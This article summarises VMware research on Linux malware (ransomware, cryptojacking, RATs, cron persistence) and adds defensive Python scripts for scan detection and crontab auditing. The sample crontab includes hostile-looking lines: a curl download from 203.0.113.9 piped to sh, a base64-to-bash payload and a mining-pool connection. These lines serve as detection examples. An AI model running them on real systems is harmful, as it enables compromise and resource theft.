Linux-based malware: What happens once it gets in

With 90% of the cloud powered by the Linux operating system, it's predictable that malware would follow, and it certainly has. However, most modern security tools are designed to address Windows-based threats, leaving huge gaps in protection and more questions than answers when it comes to understanding Linux-based malware, its threat to multi-cloud environments, and what organizations can do about it.

With this in mind, VMware's Threat Analysis Unit recently set out to study the growth of Linux-based malware and its threat to multi-cloud environments. The findings are captured in VMware’s Menacing Malware: Exposing threats lurking in your Linux-based multi-cloud report. VMware threat researchers spoke with SC Media about the report during a recent webcast. The research is further covered in an upcoming SC Special Focus report.

This article, the second in a series, focuses on what Linux-based malware does once it manages to infect its targets.

Ransomware proliferation

Unsurprisingly, one of the main goals of those who target Linux-based cloud environments is to unleash ransomware attacks. Such attacks, at least initially, unfold much like any other type of compromise: There's an initial breach, such as an exploited application or a successful phishing attack. Then the attackers burrow deeper into the environment and establish a persistent foothold.

Once established, the attackers set up a command-and-control channel through which the ransomware can be staged and triggered on demand. In the classic model the attackers do not exfiltrate data; they encrypt data or critical systems, essentially denying access, until payment is made.

More recently, attackers have taken to exfiltrating the victim's data first and threatening to release it on the dark web if the ransom isn't paid. The VMware research team has also watched ransomware attackers shift their targeting from single installations, to data centers, to cloud workloads.

"This is a worrisome trend that I'm sure will continue for the foreseeable future as the cloud becomes more and more important," said Giovanni Vigna, senior director of threat intelligence at VMware.

Linux-based crypto miners

One of the biggest motivators for attackers who infect Linux environments is to steal computing power, commonly referred to as "cryptojacking." The attacker infects systems with crypto mining software and steals CPU cycles to mine cryptocurrency for the attacker's own wallet. This is a lot less risky than infecting enterprises with ransomware and then trying to extort those victims for cash.

These attacks can be costly: higher electricity bills, increased cloud consumption charges, and degraded cloud and system performance. However, because they are not as bold as seizing systems or data, they can run under the radar for some time.

Cryptojacking attacks are no stranger to cloud systems. As the report authors noted, "The first cryptojacking attack was against Tesla's public cloud — a Kubernetes deployment was hijacked and dedicated to mining the currency, while the computational costs were paid by Tesla. This notorious event was just the first in a series of incidents that targeted the CPU cycles of cloud environments."

When VMware researchers applied their analysis to crypto miners, they found that nearly all miners utilize XMRig. Vigna said the amount of XMRig code sharing enabled the researchers to track the evolution of Linux-based mining software.

The team also examined the behaviors of the crypto mining samples they gathered. As with the ransomware samples, defense evasion is the most commonly used technique. Within defense evasion, the encryption and obfuscation techniques used by crypto miners appear more diversified than those seen in the ransomware samples.

"Also, for example, we noticed that crypto miners are not very concerned about detecting if they are on a virtualized workload, while ransomware is very active in trying to evade analysis," said Vigna.

Remote Access Trojans and Cobalt Strike

Whether their objective is ransomware, cryptojacking or something else, attackers must establish control inside the environment, for example by setting up a staging server from which they can target other networked systems and move laterally, deeper into the organization. Such is the case with Remote Access Trojans (RATs) and other implants, which let attackers monitor endpoints with keyloggers, take screenshots, exfiltrate or destroy data, plant additional malware (such as ransomware), and more.

This is how attackers gain and maintain control, persistence, and further their goals.

"We have to focus on how payloads actually get into place," said Brian Baskin, technical lead for VMware’s Threat Analysis Unit. He explained that understanding what mechanisms adversaries use to take control of the environment and how it's activated and detonated is essential to protecting against these threats.

One of the first things RATs and other implants do is scan for other systems accessible on the network.

"They will use that one compromised machine to jump to the next machine. They will enumerate all the resources within environments, such as the operating systems and vulnerabilities, and then use whatever exploits they can to move around," Baskin said.

The attacker may scan the entire range of IP addresses, or, because servers and high-value systems are often assigned addresses at the lower or higher ends of the range, concentrate on those parts of it. As systems are identified, information about them (addresses, hostnames, active user accounts, operating systems, and software versions) is collected.
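The sweep pattern described above is detectable from flow telemetry alone: a single source that reaches many distinct neighbors in a short window, with the targets bunched at the bottom and top of the subnet. The script below is an added example written for this article, not code from the VMware report or from SC Media. The flow records are constructed, the "edge" bands are assumed to be the lowest and highest 20 addresses of a /24, and the thresholds are illustrative; in practice you would feed it conntrack, VPC flow log or Zeek conn.log records and tune the window and target count to your environment.

```python
from collections import defaultdict
import ipaddress


def build_sample_flows():
    """Constructed flow records (timestamp_s, src_ip, dst_ip, dst_port).
    Not real telemetry: 10.0.5.40 talks to its database as usual, while
    10.0.5.23 sweeps SSH across the low and high ends of the /24."""
    flows = [(100 + i, "10.0.5.40", "10.0.5.200", 5432) for i in range(30)]
    # Probe the low end of the subnet (.1 - .20) ...
    flows += [(101 + i, "10.0.5.23", f"10.0.5.{i + 1}", 22) for i in range(20)]
    # ... then the high end (.240 - .254), where gateways and servers often sit.
    flows += [(130 + i, "10.0.5.23", f"10.0.5.{240 + i}", 22) for i in range(15)]
    return flows


def host_octet(ip):
    """Last octet of an IPv4 address; the /24 assumption is for this example."""
    return int(ipaddress.ip_address(ip)) & 0xFF


def detect_sweeps(flows, window=60, min_targets=10, edge=20):
    """Return one alert per source that reached at least `min_targets`
    distinct destinations inside any `window`-second span.

    edge_fraction is the share of those targets whose host octet falls in
    the bottom or top `edge` addresses of the /24, i.e. the bands the text
    says attackers scan preferentially. A value near 1.0 means the sweep
    was focused on exactly those bands rather than the whole range."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src[src].append((ts, dst, port))

    alerts = []
    for src, recs in by_src.items():
        recs.sort()
        best, start = set(), 0
        # Sliding window over time-ordered records; keep the largest target set.
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1
            seen = {dst for _, dst, _ in recs[start:end + 1]}
            if len(seen) > len(best):
                best = seen
        if len(best) < min_targets:
            continue
        at_edge = sum(
            1 for d in best if host_octet(d) <= edge or host_octet(d) >= 256 - edge
        )
        alerts.append({
            "src": src,
            "distinct_targets": len(best),
            "ports": sorted({p for _, _, p in recs}),
            "edge_fraction": round(at_edge / len(best), 2),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(build_sample_flows()):
        print(alert)
```

Run against the constructed records, only 10.0.5.23 is reported: 35 distinct targets on port 22 within one 60-second window, all of them in the edge bands. A host that legitimately talks to many peers (a monitoring server, a load balancer) will also cross the target threshold, so treat the source address and the port mix as the tuning knobs rather than the count alone.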

So that the implant conducting this reconnaissance isn't discovered, its communications are kept as covert as possible. This is done in several ways.

The implant may operate within existing encrypted tunnels or pose as just another ordinary service or application running in the background. VMware's research shows that in Linux-based multi-cloud environments, implant activity is routinely run as cron jobs. cron is the job scheduler found on Linux, macOS and other Unix systems; it runs commands at fixed times or regular intervals. A cron entry that restarts the implant on a schedule (or at boot) keeps it alive even if the running process is killed, which is what gives the implant its persistence.
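Because cron is also where legitimate maintenance lives, the defender's job is to audit the scheduled entries rather than cron itself. The script below is an added example for this article, not code from the VMware report; it parses crontab text and flags commands that carry the traits malicious cron persistence tends to have (fetch-and-pipe-to-shell, base64-decoded payloads, binaries in world-writable or hidden directories, stratum mining-pool URLs). The sample crontab is constructed, the 203.0.113.9 address is from the documentation range, and the indicator list is a starting point, not a complete signature set.

```python
import re

# Constructed sample user crontab. The suspicious entries are illustrative
# and are not taken from any sample described in the VMware report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup-check
@reboot /tmp/.x/kworkerds
*/10 * * * * curl -fsSL http://203.0.113.9/i.sh | sh
* * * * * echo aGVsbG8= | base64 -d | bash
0 * * * * /dev/shm/.m -o stratum+tcp://pool.example:3333
"""

# (reason, regex applied to the command part of each job). Order matters
# only for the order reasons are reported in.
INDICATORS = [
    ("fetches remote content and pipes it to a shell",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b")),
    ("decodes a base64 payload at run time",
     re.compile(r"\bbase64\b\s+(?:-d|--decode)\b")),
    ("executes from a world-writable directory",
     re.compile(r"(?:^|[\s|;&])/(?:tmp|var/tmp|dev/shm)/")),
    ("runs a file under a hidden (dot) directory",
     re.compile(r"/\.[^/\s]+/")),
    ("connects to a mining pool over stratum",
     re.compile(r"\bstratum\+(?:tcp|ssl)://")),
]


def parse_crontab(text, system=False):
    """Yield (schedule, user, command) for each job line in a crontab.
    Pass system=True for /etc/crontab and /etc/cron.d files, which carry
    an extra user field between the schedule and the command."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment or environment assignment
        n_sched = 1 if line.startswith("@") else 5  # @reboot etc. vs m h dom mon dow
        extra = 1 if system else 0
        fields = line.split(None, n_sched + extra)
        if len(fields) < n_sched + extra + 1:
            continue  # schedule without a command; nothing to audit
        schedule = " ".join(fields[:n_sched])
        user = fields[n_sched] if system else None
        command = fields[n_sched + extra]
        yield schedule, user, command


def audit_crontab(text, system=False):
    """Return a finding for every job whose command matches an indicator."""
    findings = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = [why for why, rx in INDICATORS if rx.search(command)]
        if reasons:
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"{f['schedule']:<12} {f['command']}")
        for why in f["reasons"]:
            print(f"    - {why}")
```

On the sample, the certbot and backup entries pass and the remaining four are reported, each with the reason it tripped. To cover a host, run it over `crontab -l -u USER` output for every account in /etc/passwd and, with `system=True`, over /etc/crontab and the files in /etc/cron.d; the @reboot entry is the one to look at first, since that is the schedule that brings an implant back after a restart.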

That persistence is used to move laterally within the environment. During lateral movement, the attackers find other vulnerable systems and install more implants to increase their endurance and ability to move deeper within the environment. The attackers will also seek troves of valuable data and systems with high access levels. This can go on for weeks and months.

Learn more about the threat Linux-based malware poses and how you can defend against it

While knowing how cybercriminals operate once inside an organization's network offers critical insight for shoring up security measures, teams also require a comprehensive picture of their own environment. The next article in this series will explore why machine learning is key to detecting the evolution and cross-pollination of ransomware and other malware.

For more insights in the meantime, download VMware’s full report or listen to SC Media’s webcast with VMware on what they discovered.

Bill Brenner

Bill Brenner is VP of Content Strategy at CyberRisk Alliance — an InfoSec content strategist, researcher, director, tech writer, blogger and community builder. He was formerly director of research at IANS, senior writer/content strategist at Sophos, senior tech writer for Akamai Technology’s Security Intelligence Research Team (Akamai SIRT), managing editor for and senior writer for
